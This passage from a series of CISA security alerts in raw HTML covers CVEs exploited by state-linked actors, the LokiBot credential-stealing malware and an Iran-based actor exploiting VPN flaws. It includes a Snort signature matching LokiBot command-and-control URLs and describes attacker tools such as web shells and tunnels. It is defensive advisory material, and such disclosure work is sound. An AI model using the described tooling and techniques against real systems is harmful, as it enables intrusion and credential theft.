(Server Core installation)</li> <li>Windows Server 2016</li> <li>Windows Server 2016 (Server Core installation)</li> <li>Windows Server 2019</li> <li>Windows Server 2019 (Server Core installation)</li> <li>Windows Server, version 1803 (Server Core Installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803">Microsoft Security Advisory for CVE-2019-0803</a></li> </ul> <p>&nbsp;</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-6327">CVE-2017-6327</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Symantec Messaging Gateway before 10.6.3-267</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.broadcom.com/support/security-center/securityupdates/detail?fid=security_advisory&amp;pvid=security_advisory&amp;year=&amp;suid=20170810_00">Broadcom Security Updates Detial for CVE-2017-6327 and CVE-2017-6328 </a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-3118">CVE-2020-3118</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>ASR 9000 Series Aggregation Services Routers</li> <li>Carrier Routing System (CRS)</li> <li>IOS XRv 9000 Router</li> <li>Network Convergence System (NCS) 540 Series Routers</li> <li>NCS 560 Series Routers</li> <li>NCS 1000 Series Routers</li> <li>NCS 5000 Series Routers</li> <li>NCS 5500 Series Routers</li> <li>NCS 6000 Series Routers</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce">Cisco Security Advisory cisco-sa-20200205-iosxr-cdp-rce</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-8515">CVE-2020-8515</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/">Draytek Security Advisory: Vigor3900 / Vigor2960 / Vigor300B Router Web Management Page Vulnerability (CVE-2020-8515)</a></li> </ul> </td> </tr> </tbody> </table> <p>&nbsp;</p> <ol start="2"> <li><strong>Implement rigorous configuration management programs. </strong>Audit configuration&nbsp;&nbsp; management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Implementing a robust configuration and patch management program hinders sophisticated APT operations by limiting the effectiveness of opportunistic attacks.<br /> &nbsp;</li> <li><strong>Disable unnecessary ports, protocols, and services.</strong> Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for C2 activity. Turn off or disable any unnecessary services or functionality within devices (e.g., universal plug and play [UPnP], PowerShell).<br /> &nbsp;</li> <li><strong>Enhance monitoring of network and email traffic.</strong> Review network signatures and indicators for focused operations activities, monitor for new phishing themes, and adjust email rules accordingly. Follow best practices of restricting attachments via email. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse.<br /> &nbsp;</li> <li><strong>Use protection capabilities to stop malicious activity.</strong> Implement antivirus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use network intrusion detection and prevention systems to identify and prevent commonly employed adversarial malware and limit nefarious data transfers.</li> </ol> <h3>Contact Information</h3><p>CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:</p> <ul> <li>1-888-282-0870 (From outside the United States: +1-703-235-8832)</li> <li><a href="https://us-cert.cisa.govmailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a> (UNCLASS)</li> </ul> <p>CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA homepage at <a href="http://www.us-cert.cisa.gov/">http://www.us-cert.cisa.gov/</a>.</p> <h3>References</h3> <ul> <li><a href="https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf">[1] White House Publication: How China’s Economic Aggression Threatens the Technologies and Intellectual Property of the United States and the World </a></li> <li><a href="https://fas.org/sgp/crs/row/IF10964.pdf">[2] Congressional Research Services: 'Made in China 2025' Industrial Policies: Issues for Congress </a></li> <li><a href="https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade">[3] Council on Foreign Relations: Is ‘Made in China 2025’ a Threat to Global Trade </a></li> <li><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">[4] Mandiant: APT1 Exposing One of China’s Cyber Espionage Units </a></li> <li><a href="https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor">[5] U.S. Department of Justice (DOJ) Press Release: U.S. Charges Five Chinese Military Hackers for Cyber Espionage Against U.S. Corporations and a Labor Organization for Commercial Advantage</a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/TA17-117A">[6] CISA Alert TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors</a></li> <li><a href="https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers">[7] DOJ Press Release: Deputy Attorney General Rod J. Rodenstein Announces Charges Against Chinese Hackers</a></li> <li><a href="https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf">[8] CISA Awareness Briefing: Chinese Cyber Activity Targeting Managed Service Providers</a></li> <li><a href="https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military">[9] DOJ Press Release: Deputy Attorney General William P. Barr Announces Indictment of Four Members of China’s Military for Hacking into Equifax</a></li> <li><a href="https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations">[10] CISA Press Release: FBI and CISA Warn Against Chinese Targeting of COVID-19 Research Organizations </a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/AA20126A">[11] CISA Alert AA20-126A: APT Groups Target Healthcare and Essential Services</a></li> <li><a href="https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity">[12] CISA Current Activity (CA): Chinese Malicious Cyber Activity</a></li> <li><a href="https://www.fireeye.com/current-threats/apt-groups.html">[13] FireEye Advanced Persistent Threat Groups</a></li> <li><a href="https://attack.mitre.org/groups/G0022/">[14] MITRE ATT&CK: APT3</a></li> <li><a href="https://attack.mitre.org/groups/G0073/">[15] MITRE ATT&CK: APT19</a></li> <li><a href="https://attack.mitre.org/groups/G0096/">[16] MITRE ATT&CK: APT41</a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-133a">[17] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities</a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-020a">[18] CISA Alert AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP</a></li> <li><a href="https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve">[19] CISA CA: F5 Releases Security Advisory for BIP-IP TMUI RCE Vulnerability, CVE-2020-5902</a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-133a">[20] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities</a></li> <li><a href="https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF">[21] NSA Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities</a></li> </ul> <h3>Revisions</h3> <ul> <li>October 1, 2020: Initial Version</li> <li>October 20, 2020: Recommended Actions Section Updated</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>

AA20-266A: LokiBot Malware
Original release date: September 22, 2020 | Last revised: October 24, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/versions/v7/matrices/enterprise/">ATT&amp;CK for Enterprise</a> frameworks for all referenced threat actor techniques.</em></p> <p>This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions by the<a href="https://www.cisecurity.org/ms-isac/"> Multi-State Information Sharing &amp; Analysis Center (MS-ISAC)</a>.</p> <p>CISA has observed a notable increase in the use of LokiBot malware by malicious cyber actors since July 2020. Throughout this period, CISA’s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected persistent malicious LokiBot activity. LokiBot uses a credential- and information-stealing malware, often sent as a malicious attachment and known for being simple, yet effective, making it an attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases.</p> <h3>Technical Details</h3><p>LokiBot—also known as Lokibot, Loki PWS, and Loki-bot—employs Trojan malware to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials.</p> <ul> <li>The malware steals credentials through the use of a keylogger to monitor browser and desktop activity (<em>Credentials from Password Stores</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1555/">T1555</a>]). <ul> <li>(<em>Credentials from Password Stores: Credentials from Web Browsers</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1555/003">T1555.003</a>])</li> <li>(<em>Input Capture: Keylogging</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1056/001">T1056.001</a>])</li> </ul> </li> <li>LokiBot can also create a backdoor into infected systems to allow an attacker to install additional payloads (<em>Event Triggered Execution: Accessibility Features</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/008/">T1546.008</a>]).</li> <li>Malicious cyber actors typically use LokiBot to target Windows and Android operating systems and distribute the malware via email, malicious websites, text, and other private messages (<em>User Execution: Malicious File</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1204/002/">T1204.002</a>]). See figure 1 for enterprise techniques used by LokiBot.</li> </ul> <p data-entity-type="" data-entity-uuid="" style="text-align: center;"><span><img alt="" data-entity-type="" data-entity-uuid="" height="655" src="https://us-cert.cisa.gov/sites/default/files/2020-09/091520_LokiBot_Malware_Alert.png" width="1064" /><span title="Click and drag to resize">​</span></span></p> <p class="text-align-center"><em>Figure 1: MITRE ATT&amp;CK enterprise techniques used by LokiBot</em></p> <p>Since LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications, including the following.</p> <ul> <li><strong>February 2020: </strong>Trend Micro identified cyber actors using LokiBot to impersonate a launcher for Fortnite—a popular video game.[<a href="https://blog.trendmicro.com/trendlabs-security-intelligence/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file/">1</a>]</li> <li><strong>August 2019: </strong>FortiGuard SE researchers discovered a malspam campaign distributing LokiBot information-stealing payloads in spearphishing attack on a U.S. manufacturing company.[<a href="https://www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot#:~:text=The%20FortiGuard%20Labs%20SE%20team%20identified%20a%20new,manufacturing%20company%20utilizing%20the%20well%20documented%20infostealer%20LokiBot.">2</a>]</li> <li><strong>August 2019:</strong> Trend Micro researchers reported LokiBot malware source code being hidden in image files spread as attachments in phishing emails.[<a href="https://www.zdnet.com/article/lokibot-information-stealer-now-hides-malware-in-image-files/">3</a>]</li> <li><strong>June 2019: </strong>Netskope uncovered LokiBot being distributed in a malspam campaign using ISO image file attachments.[<a href="https://www.securityweek.com/lokibot-and-nanocore-malware-distributed-iso-image-files">4</a>]</li> <li><strong>April 2019:</strong> Netskope uncovered a phishing campaign using malicious email attachments with LokiBot malware to create backdoors onto infected Windows systems and steal sensitive information.[<a href="https://www.netskope.com/blog/lokibot-nanocore-iso-disk-image-files">5</a>]</li> <li><strong>February 2018: </strong>Trend Micro discovered CVE-2017-11882 being exploited in an attack using Windows Installer service to deliver LokiBot malware.[<a href="https://www.trendmicro.com/en_us/research/18/b/attack-using-windows-installer-msiexec-exe-leads-lokibot.html">6</a>]</li> <li><strong>October 2017:</strong> SfyLabs identified cyber actors using LokiBot as an Android banking trojan that turns into ransomware.[<a href="https://www.bleepingcomputer.com/news/security/lokibot-android-banking-trojan-turns-into-ransomware-when-you-try-to-remove-it/">7</a>]</li> <li><strong>May 2017: </strong>Fortinet reported malicious actors using a PDF file to spread a new LokiBot variant capable of stealing credentials from more than 100 different software tools.[<a href="https://www.fortinet.com/blog/threat-research/new-loki-variant-being-spread-via-pdf-file">8</a>]</li> <li><strong>March 2017:</strong> Check Point discovered LokiBot malware found pre-installed on Android devices.[<a href="https://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/">9</a>]</li> <li><strong>December 2016:</strong> Dr.Web researchers identified a new LokiBot variant targeting Android core libraries.[<a href="https://www.bleepingcomputer.com/news/security/loki-trojan-infects-android-libraries-and-system-process-to-get-root-privileges/">10</a>]</li> <li><strong>February 2016: </strong>Researchers discovered the LokiBot Android Trojan infecting the core Android operating system processes.[<a href="https://www.cyber.nj.gov/threat-center/threat-profiles/android-malware-variants/lokibot">11</a>]</li> </ul> <h3>MITRE ATT&amp;CK Techniques</h3> <p>According to MITRE, <a href="https://attack.mitre.org/versions/v7/software/S0447/">LokiBot</a> uses the ATT&amp;CK techniques listed in table 1.</p> <p class="italic text-align-center"><em>Table 1: LokiBot ATT&amp;CK techniques </em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="534" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 448px;"> <p>Technique</p> </th> <th scope="col" style="width: 492px;"> <p>Use</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>System Network Configuration Discovery</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1016">T1016</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has the ability to discover the domain name of the infected host.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Obfuscated Files or Information</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1027/">T1027</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has obfuscated strings with base64 encoding.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Obfuscated Files or Information: Software Packing</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1027/002/">T1027.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has used several packing methods for obfuscation.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>System Owner/User Discovery</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1033">T1033</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has the ability to discover the username on the infected host.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Exfiltration Over C2 Channel</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1041/">T1041</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has the ability to initiate contact with command and control to exfiltrate stolen data.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Process Injection: Process Hollowing</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055/012/">T1055.012</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has used process hollowing to inject into legitimate Windows process vbc.exe.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Input Capture: Keylogging</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1056/001">T1056.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has the ability to capture input on the compromised host via keylogging.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Application Layer Protocol: Web Protocols </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1071/001">T1071.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has used Hypertext Transfer Protocol for command and control.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>System Information Discovery</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1082">T1082</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has the ability to discover the computer name and Windows product name/version.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>User Execution: Malicious File</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1204/002/">T1204.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has been executed through malicious documents contained in spearphishing emails.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Credentials from Password Stores</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1555/">T1555</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has stolen credentials from multiple applications and data sources including Windows operating system credentials, email clients, File Transfer Protocol, and Secure File Transfer Protocol clients.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Credentials from Password Stores: Credentials from Web Browsers</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1555/003">T1555.003</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and Chromium and Mozilla Firefox-based web browsers.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Hide Artifacts: Hidden Files and Directories</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1564/001/">T1564.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has the ability to copy itself to a hidden file and directory.</p> </td> </tr> </tbody> </table> <h3>Detection</h3> <h4>Signatures</h4> <p>CISA developed the following Snort signature for use in detecting network activity associated with LokiBot activity.</p> <div class="special_container">alert tcp any any -&gt; any $HTTP_PORTS (msg:"Lokibot:HTTP URI POST contains '/*/fre.php' post-infection"; flow:established,to_server; flowbits:isnotset,.tagged; content:"/fre.php"; http_uri; fast_pattern:only; urilen:&lt;50,norm; content:"POST"; nocase; http_method; pcre:"/\/(?:alien|loky\d|donep|jemp|lokey|new2|loki|Charles|sev7n|dbwork|scroll\/NW|wrk|job|five\d?|donemy|animation\dkc|love|Masky|v\d|lifetn|Ben)\/fre\.php$/iU"; flowbits:set,.tagged;classtype:http-uri; metadata:service http; metadata:pattern HTTP-P001,)</div> <h1><o:p></o:p></h1> <h3>Mitigations</h3><p>CISA and MS-ISAC recommend that federal, state, local, tribal, territorial government, private sector users, and network administrators consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.</p> <ul> <li>Maintain up-to-date antivirus signatures and engines. See <a href="https://www.us-cert.gov/ncas/tips/ST18-271">Protecting Against Malicious Code</a>.</li> <li>Keep operating system patches up to date. See <a href="https://www.us-cert.gov/ncas/tips/ST04-006">Understanding Patches and Software Updates</a>.</li> <li>Disable file and printer sharing services. If these services are required, use <a href="https://us-cert.cisa.gov/ncas/tips/ST04-002">strong passwords</a> or Active Directory authentication.</li> <li>Enforce multi-factor authentication. See <a href="https://www.us-cert.gov/ncas/tips/ST05-012">Supplementing Passwords </a>for more information.</li> <li>Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators’ group unless required.</li> <li>Enforce a strong password policy. See <a href="https://www.us-cert.gov/ncas/tips/ST04-002">Choosing and Protecting Passwords</a>.</li> <li>Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See <a href="https://www.us-cert.gov/ncas/tips/ST04-010">Using Caution with Email Attachments</a>.</li> <li>Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.</li> <li>Disable unnecessary services on agency workstations and servers.</li> <li>Scan for and remove suspicious email attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).</li> <li>Monitor users' web browsing habits; restrict access to sites with unfavorable content.</li> <li>Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).</li> <li>Scan all software downloaded from the internet prior to executing.</li> <li>Maintain situational awareness of the latest threats and implement appropriate access control lists.</li> <li>Visit the MITRE ATT&amp;CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.</li> </ul> <p>For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, <a href="https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final">Guide to Malware Incident Prevention and Handling for Desktops and Laptops</a>.</p> <h3>Resources</h3> <p>Center for Internet Security Security Event Primer – Malware: <a href="https://www.cisecurity.org/white-papers/security-event-primer-malware/">https://www.cisecurity.org/white-papers/security-event-primer-malware/</a><br /> MITRE ATT&amp;CK – LokiBot: <a href="https://attack.mitre.org/versions/v7/software/S0447/">https://attack.mitre.org/software/S0447/</a><br /> MITRE ATT&amp;CK for Enterprise: <a href="https://attack.mitre.org/versions/v7/matrices/enterprise/">https://attack.mitre.org/matrices/enterprise/</a></p> <h3>References</h3> <ul> <li><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file/">[1] Trend Micro: LokiBot Impersonates Popular Game Launcher and Drops Compiled C# Code File </a></li> <li><a href="https://www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot#:~:text=The%20FortiGuard%20Labs%20SE%20team%20identified%20a%20new,manufacturing%20company%20utilizing%20the%20well%20documented%20infostealer%20LokiBot.">[2] Fortinet: Newly Discovered Infostealer Attack Uses LokiBot </a></li> <li><a href="https://www.zdnet.com/article/lokibot-information-stealer-now-hides-malware-in-image-files/">[3] ZDNet: LokiBot Malware Now Hides its Source Code in Image Files</a></li> <li><a href="https://www.securityweek.com/lokibot-and-nanocore-malware-distributed-iso-image-files">[4] SecurityWeek: LokiBot and NanoCore Malware Distributed in ISO Image Files</a></li> <li><a href="https://www.netskope.com/blog/lokibot-nanocore-iso-disk-image-files">[5] Netskope: LokiBot & NanoCore being distributed via ISO disk image files </a></li> <li><a href="https://www.trendmicro.com/en_us/research/18/b/attack-using-windows-installer-msiexec-exe-leads-lokibot.html">[6] Trend Micro: Attack Using Windows Installer Leads to LokiBot</a></li> <li><a href="https://www.bleepingcomputer.com/news/security/lokibot-android-banking-trojan-turns-into-ransomware-when-you-try-to-remove-it/">[7] BleepingComputer: LokiBot Android Banking Trojan Turns Into Ransomware When You Try to Remove It</a></li> <li><a href="https://www.fortinet.com/blog/threat-research/new-loki-variant-being-spread-via-pdf-file">[8] Fortinet: New Loki Variant Being Spread via PDF File</a></li> <li><a href="https://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/">[9] Check Point: Preinstalled Malware Targeting Mobile Users</a></li> <li><a href="https://www.bleepingcomputer.com/news/security/loki-trojan-infects-android-libraries-and-system-process-to-get-root-privileges/">[10] BleepingComputer: Loki Trojan Infects Android Libraries and System Process to Get Root Privileges</a></li> <li><a href="https://www.cyber.nj.gov/threat-center/threat-profiles/android-malware-variants/lokibot">[11] New Jersey Cybersecurity & Communications Integration Cell: LokiBot  </a></li> </ul> <h3>Revisions</h3> <ul> <li>September 22, 2020: Initial Version</li> <li>September 23, 2020: Added hyperlink to MS-ISAC</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>

AA20-259A: Iran-Based Threat Actor Exploits VPN Vulnerabilities
Original release date: September 15, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/matrices/enterprise/">ATT&amp;CK for Enterprise</a> framework for all referenced threat actor techniques.</em></p> <p>This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor’s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.</p> <p>This Advisory provides the threat actor’s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.</p> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf">Click here</a> for a PDF version of this report.</p> <h3>Technical Details</h3><p>CISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.</p> <p>After gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor’s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor’s own financial interests. The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.</p> <p>CISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.</p> <p>Table 1 illustrates some of the common tools this threat actor has used.</p> <p class="italic text-align-center"><em>Table 1: Common exploit tools</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="632" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 448px;"> <p>Tool</p> </th> <th scope="col" style="width: 492px;"> <p>Detail</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p>ChunkyTuna web shell</p> </td> <td scope="col" style="text-align: left; width: 492px;">ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p>Tiny web shell</p> </td> <td scope="col" style="text-align: left; width: 492px;">Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p>China Chopper web shell</p> </td> <td scope="col" style="text-align: left; width: 492px;">China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;">FRPC</td> <td scope="col" style="text-align: left; width: 492px;">FRPC is a modified version of the open-source FRP tool. It allows a system—inside a router or firewall providing Network Address Translation—to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;">Chisel</td> <td scope="col" style="text-align: left; width: 492px;">Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;">ngrok</td> <td scope="col" style="text-align: left; width: 492px;">ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;">Nmap</td> <td scope="col" style="text-align: left; width: 492px;">Nmap is used for vulnerability scanning and network discovery.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;">Angry IP Scanner</td> <td>Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;">Drupwn</td> <td scope="col" style="text-align: left; width: 492px;">Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices.</td> </tr> </tbody> </table> <p><br /> Notable means of detecting this threat actor:</p> <ul> <li>CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.</li> <li>The threat actor uses FRPC over port 7557.</li> <li><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a">Malware Analysis Report 